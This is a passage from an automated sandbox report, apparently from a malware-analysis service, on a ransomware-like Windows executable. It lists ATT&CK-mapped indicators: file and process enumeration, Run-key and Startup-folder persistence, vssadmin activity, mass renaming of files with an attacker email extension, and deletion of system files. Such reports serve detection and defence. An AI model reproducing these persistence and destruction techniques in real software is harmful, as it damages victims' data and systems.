\"4048\" - (UID: 00000000-00004048)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindFirstFileW\" with parameter C:\\* (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindFirstFileW\" with parameter C:\\$Recycle.Bin\\* (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter S-1-5-21-2092356043-4041700817-663127204-1001 (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindFirstFileW\" with parameter C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\* (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter desktop.ini (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindFirstFileW\" with parameter C:\\Documents and Settings\\* (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindFirstFileW\" with parameter C:\\MSOCache\\* (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter All Users (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindFirstFileW\" with parameter C:\\MSOCache\\All Users\\* (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindNextFileW\" with parameter {90140000-0011-0000-0000-0000000FF1CE}-C (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"FindFirstFileW\" with parameter C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\* (UID: 00000000-00006140)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"vssadmin.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004048)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.442849569501336", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"vssadmin.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00004048)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"vssadmin.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"DISMHOST.EXE.67A614A7.bin\" claimed CRC 103114 while the actual is CRC 152663\n \"MODE.COM.67A60B94.bin\" claimed CRC 42325 while the actual is CRC 103114", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"C4816EDACF346F207E7F3FDD5F519FEFD2465D21E08CAD1936A1BDE32D7FAEA0.EXE\"; Value: \"%WINDIR%\\System32\\c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"HncXsecCore8.dll.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"A3DUtils.dll.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe]- [targetUID: 00000000-00006140]\n \"Statement.xlsx.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"autoit.php.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"DISMHOST.EXE.67A614A7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Job1_18.drt.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"BacG4_20.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"Kind2_08.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"Monthly Calendar - Land.hcdt.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"MODE.COM.67A60B94.bin\" has type \"PE32 executable (console) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"TaleF_05.drt.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"CAni1_02.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"COthe_05.drt.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"ui-strings.js.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"Offi1_19.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"HM07_01.png.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"HeaderConstants.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_GUICtrlRebar_GetBKColor.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_GUICtrlRichEdit_HideSelection.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_GUICtrlHeader_GetItemRectEx.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_WinAPI_GetBinaryType.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"ChrtA_11.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"ui-strings.js.id-085CDA53._vijurytos@tuta.io_.V\" has type \"COM executable for MS-DOS\"- [targetUID: N/A]\n \"IFood_12.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_ArrayTrim.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"RougR_04.PNG.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_WinAPI_EqualMemory.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]\n \"_WinAPI_GetFileSizeOnDisk.au3.id-085CDA53._vijurytos@tuta.io_.V\" has type \"DOS executable (COM)\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0\" has section name .rdata with entropy \"7.78504061339\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0\" has section name .data with entropy \"7.98265499137\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" has section name .rdata with entropy \"7.78504061339\"\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" has section name .data with entropy \"7.98265499137\"\n \"DISMHOST.EXE.67A614A7.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67A614A7.bin\" has section name .data with entropy \"6.44580003198\"\n \"MODE.COM.67A60B94.bin\" has section name .text with entropy \"6.35633096152\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00006140)\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" called \"Process32NextW with parameter dinotify.exe\" (UID: 00000000-00006140)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "binary-10", "type": 8, "relevance": 5, "name": "The input sample dropped very many files", "description": "The input sample dropped 694 files (often an indicator for ransomware)", "origin": "Binary File", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%WINDIR%\\system32\\cmd.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Cryptographic Related", "identifier": "binary-60", "type": 8, "relevance": 5, "name": "Dropped file has high entropy (likely encrypted/compressed content)", "description": "Dropped file \"%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" has high entropy 7.442849569501336", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\autoexec.bat\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\config.sys\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.msi\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.msi\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.msi\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.exe\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.msi\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\osetupui.dll\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\7-Zip\\7z.sfx\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\7-Zip\\7zG.exe\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\7-Zip\\descript.ion\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Esl\\AiodLite.dll\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\AppCenter_R.aapp\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\Compare_R_RHP.aapp\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\CPDF_Full.aapp\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\CPDF_RHP.aapp\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\Edit_R_Exp_RHP.aapp\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\Edit_R_Full.aapp\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\Edit_R_RHP.aapp\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\EPDF_Full.aapp\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\MoreTools.aapp\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\OptimizePDF_R_RHP.aapp\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroApp\\ENU\\Pages_R_RHP.aapp\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\Acrofx32.dll\" for deletion\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" marked \"C:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\ADelRCP.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\autoexec.bat\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\config.sys\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\dotnet48.exe\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-0016-0409-0000-0000000FF1CE}-C\\ExcelMUI.msi\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\PowerPointMUI.msi\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\PublisherMUI.msi\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlkLR.cab\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\OutlookMUI.msi\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.msi\" with delete access\n \"c4816edacf346f207e7f3fdd5f519fefd2465d21e08cad1936a1bde32d7faea0.exe\" opened \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.cab\" with delete access\n 